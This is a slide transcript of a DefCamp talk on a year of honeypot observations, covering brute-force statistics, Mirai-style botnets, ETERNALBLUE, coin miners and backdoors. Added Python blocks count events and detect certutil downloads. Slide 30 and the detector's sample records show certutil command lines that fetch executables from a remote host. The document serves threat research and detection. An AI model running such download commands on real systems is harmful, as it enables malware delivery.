From Mirai to Monero – One Year’s Worth of Honeypot Data

Published on

Adrian Hada and Mihai Vasilescu in Bucharest, Romania on November 8-9th 2018 at DefCamp #9.

The slides and other presentations can be found on https://def.camp/archive

Published in: Technology
From Mirai to Monero – One Year’s Worth of Honeypot Data (slide transcript)

  1. MIRAI TO MONERO – ONE YEAR’S WORTH OF HONEYPOT DATA
     Adrian Hada, Senior Security Researcher
     Mihai Vasilescu, Senior Security Researcher
     © 2017 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED.
  2. WHO ARE WE?
     • Senior security researchers
     • Love exploits, malware, honeypots and tinkering
     • Good guys
     • Hope for unemployment because #securityissolved
     • @ht_adrian & @me_high4eva
  3. WHO ARE WE?
  4. HONEY NETWORK – Honeypot distribution
  5. WHAT ARE ATTACKERS LIKE?
  6. ATTACKERS ARE...
     • Persistent
     • Not very fashionable
     • Resourceful
     • Opportunistic
     • All the above
     • Driven
  7. HONEY NETWORK – Distribution by targets
  8. PERSISTENT – BRUTE FORCE: Protocols
     • TELNET
     • SSH
     • SMTP
     • POP3
     • IMAP
     • VNC
     • HTTP
     • WordPress
     • Joomla
     • PHPMyAdmin
     • And the list goes on
  9. PERSISTENT – BRUTE FORCE: Bucketed Brute Force Events
     • Note: one “event” is a per-hour aggregation
     [Chart: Events (0 to 250000) per month, January-18 through September-18]
 10. PERSISTENT – BRUTE FORCE: Unique IP Addresses
     [Chart: Unique IP Addresses (0 to 40000) per month, January-18 through September-18]
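Slides 9 to 11 define the metrics the charts are built from: an “event” is one (hour, source IP, target) bucket, unique IPs are counted per month, and target prevalence is the share of events per target. The following is an added example, not code from the talk; the raw attempt records are constructed and the bucketing key is an assumption about how the per-hour aggregation was done.

```python
from collections import defaultdict
from datetime import datetime

# Constructed sample of raw honeypot login attempts (timestamp, source IP, target).
# Made-up records for illustration, not data from the talk.
RAW_ATTEMPTS = [
    ("2018-01-03 10:02:11", "198.51.100.7", "Telnet-Bruteforce"),
    ("2018-01-03 10:17:45", "198.51.100.7", "Telnet-Bruteforce"),  # same hour -> same event
    ("2018-01-03 10:59:59", "198.51.100.7", "Telnet-Bruteforce"),  # still the same hour
    ("2018-01-03 11:00:00", "198.51.100.7", "Telnet-Bruteforce"),  # new hour -> new event
    ("2018-01-03 10:05:00", "203.0.113.9", "SSH-Bruteforce"),
    ("2018-02-14 08:30:00", "203.0.113.9", "SSH-Bruteforce"),
    ("2018-02-14 08:31:00", "198.51.100.7", "SSH-Bruteforce"),
]

FMT = "%Y-%m-%d %H:%M:%S"

def bucket_events(attempts):
    """Collapse raw attempts into per-hour events keyed by (hour, src_ip, target).
    Returns {month: {target: event_count}}; one bucket counts as one event,
    however many raw attempts fell into it (assumed bucketing key)."""
    buckets = set()
    for ts, ip, target in attempts:
        hour = datetime.strptime(ts, FMT).replace(minute=0, second=0)
        buckets.add((hour, ip, target))
    events = defaultdict(lambda: defaultdict(int))
    for hour, _ip, target in buckets:
        events[hour.strftime("%B-%y")][target] += 1  # "January-18" style labels
    return {m: dict(t) for m, t in events.items()}

def unique_ips_per_month(attempts):
    """Distinct source IPs per month (the 'Unique IP Addresses' series)."""
    seen = defaultdict(set)
    for ts, ip, _target in attempts:
        seen[datetime.strptime(ts, FMT).strftime("%B-%y")].add(ip)
    return {m: len(ips) for m, ips in seen.items()}

def target_prevalence(attempts):
    """Share of events per target over the whole period, as whole percents."""
    totals = defaultdict(int)
    for month in bucket_events(attempts).values():
        for target, n in month.items():
            totals[target] += n
    grand = sum(totals.values())
    return {t: round(100 * n / grand) for t, n in totals.items()}
```

Seven raw attempts collapse to five events here, which is why the event counts on slide 9 understate the raw connection volume.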
 11. PERSISTENT – BRUTE FORCE: Target Prevalence (Top 10 Bruteforce Targets)
     • Telnet-Bruteforce 53%
     • SSH-Bruteforce 38%
     • MySQL/MSSQL Bruteforce 7%
     • SMTP Authentication Bruteforce 2%
     • Generic PHP Application Login Bruteforce 0%
     • RDP-Bruteforce 0%
     • POP3 Bruteforce 0%
     • VNC Bruteforce 0%
     • XMLRPC sys.multicall Bruteforce Authentication 0%
 12. PERSISTENT – BRUTE FORCE: Bruteforce Stats - October 2018
     • Telnet-Bruteforce
     • SSH-Bruteforce
     • MySQL/MSSQL Bruteforce
     • VNC Bruteforce
     • Generic PHP Application Login Bruteforce
     • RDP-Bruteforce
     • POP3 Bruteforce
     • XMLRPC sys.multicall Bruteforce Authentication
 13. PERSISTENT - CSI: Cisco Smart Install
     • Not that many hits (approx. 6000)
     • VMs, not Cisco hardware
 14. NOT VERY FASHIONABLE: Dahua DVRs
     • CVE-2013-6117
 15. NOT VERY FASHIONABLE: ETERNALBLUE
     • Yes, it's the WannaCry one...
 16. NOT VERY FASHIONABLE: NTP & DNS
     • It’s all fun and games
     • Until you expose a DNS “open resolver”
 17. RESOURCEFUL: XAttacker
 18. RESOURCEFUL: XAttacker
 19. RESOURCEFUL: XAttacker
 20. RESOURCEFUL: XAttacker Bucketed Hits
     [Chart: hits (0 to 1200) per month, January-18 through September-18]
 21. OPPORTUNISTIC: Drupalgeddon[23]
 22. ALL OF THESE: DLink – multiple vulnerabilities
 23. ALL OF THESE: MySQL
 24. DRIVEN - DDOS: Mirai & Clones
     • Evolution of number of events
 25. DRIVEN - DDOS: Mirai & Clones
     • Evolution of number of events
 26. DRIVEN - DDOS: Mirai & Clones
     • Fortinet blogged: https://www.fortinet.com/blog/threat-research/ddos-for-hire-service-powered-by-bushido-botnet-.html
 27. DRIVEN - DDOS: Nitol
     • Antique bot, Windows, possibly modified
     • Seen via MySQL and ETERNALBLUE
 28. DRIVEN - DDOS: Other Bots
     • Multiple documented families
     • DDoSTF via MySQL (reported by MalwareMustDie in 2016)
     • DoFloo DDoS Trojan – validate using the CC decryptor from https://github.com/felicitychou/RATConf-DecryptScript
 29. DRIVEN - COIN MINERS
     • Seen via multiple exploits
     • Monero is the go-to currency
     • Reuse open mining tools
     • Example from ETERNALBLUE
 30. DRIVEN - COIN MINERS
     • Notice something strange?
       certutil.exe –urlcache –split –f <url>
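Slide 30 shows a miner being fetched with certutil.exe, a signed Windows binary rather than a dedicated downloader. The detection logic below is an added example, not from the talk: it flags process-creation records where certutil is invoked with urlcache and f plus a URL, normalising the slash and en-dash switch prefixes (the slide itself shows en dashes) so the match is not trivially evaded. The log records are constructed and the heuristic is an assumption, not a vendor rule.

```python
from urllib.parse import urlparse

# Constructed process-creation records (image path, command line), made up for
# this example; they are not events from the honeypot data in the talk.
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\certutil.exe",
     "certutil.exe -urlcache -split -f http://203.0.113.5/x.exe C:\\Users\\Public\\svc.exe"),
    ("C:\\Windows\\System32\\certutil.exe",
     "certutil  /urlcache /f  https://203.0.113.5/m.bin m.bin"),            # slash-style switches
    ("C:\\Windows\\System32\\certutil.exe",
     "certutil.exe –urlcache –split –f http://203.0.113.5/y.exe y.exe"),    # en dashes, as on the slide
    ("C:\\Windows\\System32\\certutil.exe",
     "certutil -urlcache -f http://crl.example.net/root.crl"),             # no local output file
    ("C:\\Windows\\System32\\certutil.exe",
     "certutil -verify -urlfetch cert.cer"),                                 # not a download
]

SWITCH_PREFIXES = ("-", "/", "\u2013", "\u2014")  # hyphen, slash, en dash, em dash

def normalize_switches(cmdline):
    """Tokenise and rewrite any switch prefix to '-' (lower-cased switch names);
    non-switch tokens such as URLs and paths are left untouched."""
    toks = []
    for tok in cmdline.split():
        if tok[0] in SWITCH_PREFIXES:
            tok = "-" + tok[1:].lower()
        toks.append(tok)
    return toks

def certutil_download(image, cmdline):
    """Return the remote URL when certutil is used as a downloader (urlcache + f
    with an http(s) argument), else None. Assumed heuristic, not an official rule."""
    if not image.lower().endswith("certutil.exe"):
        return None
    toks = normalize_switches(cmdline)
    if "-urlcache" not in toks or "-f" not in toks:
        return None
    urls = [t for t in toks if urlparse(t).scheme in ("http", "https")]
    return urls[0] if urls else None

def triage(events):
    """For every flagged event return (url, local output path or None); a missing
    output path means the fetch only landed in certutil's cache."""
    hits = []
    for image, cmdline in events:
        url = certutil_download(image, cmdline)
        if url is None:
            continue
        toks = normalize_switches(cmdline)
        after = [t for t in toks[toks.index(url) + 1:] if not t.startswith("-")]
        hits.append((url, after[0] if after else None))
    return hits
```

The CRL-looking record is still reported, with no output path, so an analyst can separate cache-only fetches from writes to disk rather than having the rule silently drop them.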
 31. DRIVEN - COIN MINERS
     • Technique described previously, not new
     • Xavier Mertens’ ISC diary: https://isc.sans.edu/diary/rss/23517
 32. DRIVEN - BACKDOORS: Zegost Trojan
     • Main source – ETERNALBLUE
     • (allegedly) Chinese backdoor - https://artemonsecurity.blogspot.com/2012/12/zegost-analysis-of-chinese-backdoor.html
     • DLL file contains download URL for executable
     • Payload conf can be decrypted via RATConf-DecryptScript
 33. DRIVEN – BACKDOORS WITH A TWIST: Zegost Trojan
     • One sample URL downloaded 8.5M of data..
     • Apparently, Themida-packed binary
     • Sandbox it!
 34. “IT’S 2019. THE INTERNET IS STILL A DANGEROUS PLACE. WHETHER WINDOWS OR LINUX. OR MAC.” – Us, 2018
 35. (no content)
 36. “ATTACKERS ARE A LOT LIKE US. IF THEY CAN BREAK THINGS, WE CAN PROTECT THEM.” – Us, 2018
 37. (no content)